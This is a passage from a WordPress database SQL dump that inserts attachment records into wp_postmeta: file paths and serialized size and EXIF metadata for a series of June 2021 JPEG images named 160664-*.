17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28784, 11774, '_wp_attached_file', '2021/06/160664-06.4.jpg'),
(28785, 11774, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.4.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.4-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.4-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28786, 11775, '_wp_attached_file', '2021/06/160664-06.5.jpg'),
(28787, 11775, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.5.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.5-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.5-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.5-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.5-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28788, 11776, '_wp_attached_file', '2021/06/160664-06.6.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(28789, 11776, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.6.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.6-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.6-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.6-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.6-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28790, 11777, '_wp_attached_file', '2021/06/160664-06.7.jpg'),
(28791, 11777, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.7.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.7-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.7-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.7-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.7-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28792, 11778, '_wp_attached_file', '2021/06/160664-06.8.jpg'),
(28793, 11778, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.8.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.8-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.8-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.8-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.8-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28794, 11779, '_wp_attached_file', '2021/06/160664-06.9.jpg'),
(28795, 11779, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:23:\"2021/06/160664-06.9.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"160664-06.9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"160664-06.9-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"160664-06.9-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"160664-06.9-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"160664-06.9-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28796, 11780, '_wp_attached_file', '2021/06/160664-06.10.jpg'),
(28797, 11780, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:24:\"2021/06/160664-06.10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"160664-06.10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"160664-06.10-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"160664-06.10-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"160664-06.10-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"160664-06.10-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28798, 11781, '_wp_attached_file', '2021/06/160664-06.11.jpg'),
(28799, 11781, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:24:\"2021/06/160664-06.11.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"160664-06.11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"160664-06.11-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"160664-06.11-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"160664-06.11-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"160664-06.11-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28800, 11782, '_wp_attached_file', '2021/06/160664-06.12.jpg'),
(28801, 11782, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:24:\"2021/06/160664-06.12.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"160664-06.12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"160664-06.12-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"160664-06.12-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"160664-06.12-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"160664-06.12-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28802, 11783, '_wp_attached_file', '2021/06/160664-07.jpg'),
(28803, 11783, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:21:\"2021/06/160664-07.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-07-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-07-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-07-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-07-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-07-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28804, 11784, '_wp_attached_file', '2021/06/160664-08.jpg'),
(28805, 11784, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:21:\"2021/06/160664-08.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-08-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-08-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-08-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-08-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-08-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28806, 11785, '_wp_attached_file', '2021/06/160664-09.jpg'),
(28807, 11785, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:540;s:4:\"file\";s:21:\"2021/06/160664-09.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-09-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-09-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-09-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-09-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28808, 11786, '_wp_attached_file', '2021/06/160664-10.jpg'),
(28809, 11786, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-10.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-10-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-10-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-10-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-10-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28810, 11787, '_wp_attached_file', '2021/06/160664-11.jpg'),
(28811, 11787, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-11.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-11-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-11-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-11-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-11-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28812, 11788, '_wp_attached_file', '2021/06/160664-13.jpg'),
(28813, 11788, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-13.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-13-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-13-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-13-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-13-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28814, 11789, '_wp_attached_file', '2021/06/160664-15.jpg'),
(28815, 11789, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-15.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-15-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-15-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-15-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"160664-15-400x259.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:259;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(28816, 11790, '_wp_attached_file', '2021/06/160664-12.jpg'),
(28817, 11790, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1049;s:6:\"height\";i:680;s:4:\"file\";s:21:\"2021/06/160664-12.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"160664-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"160664-12-300x194.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:194;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"160664-12-768x498.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:498;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"160664-12-1024x664.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:664;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-h